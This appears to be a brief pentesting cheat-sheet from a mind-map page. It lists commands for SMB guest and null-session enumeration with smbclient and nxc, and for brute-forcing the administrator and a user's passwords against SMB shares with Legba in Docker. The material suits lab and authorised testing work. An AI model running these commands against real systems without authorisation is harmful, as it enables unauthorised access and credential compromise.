x

SMB Authentication Attacks

Guest or Anonymous Access to Shares

Sometimes its possible to properly authenticate to SMB even without knowing any credentials. This could lead to RCE. Try to authenticate to the guest account

Attempt guest account authentication 

smbclient -U Guest IP

nxc smb IP -u "somenonexistentaccount" -p "" --shares

Try to authenticate using a null session 

nxc smb IP -u '' -p '' --users

Bruteforcing SMB with Legba

Get a shall within legba docker 

docker run --entrypoint "/bin/bash" -v $(pwd)/wordlists:/data --network host -it evilsocket/legba:latest

Bruteforce administrator password 

legba smb --smb-workgroup nd.lab --smb-share "C$" --username administrator --password ./wordlists/passwords.txt --target IP

Bruteforce a specific user's password 

legba smb --smb-workgroup nd.lab --smb-share "SharedFiles" -username oscar --password ./wordlists/passwords.txt --target IP
Left-click: follow link, Right-click: select node, Scroll: zoom
x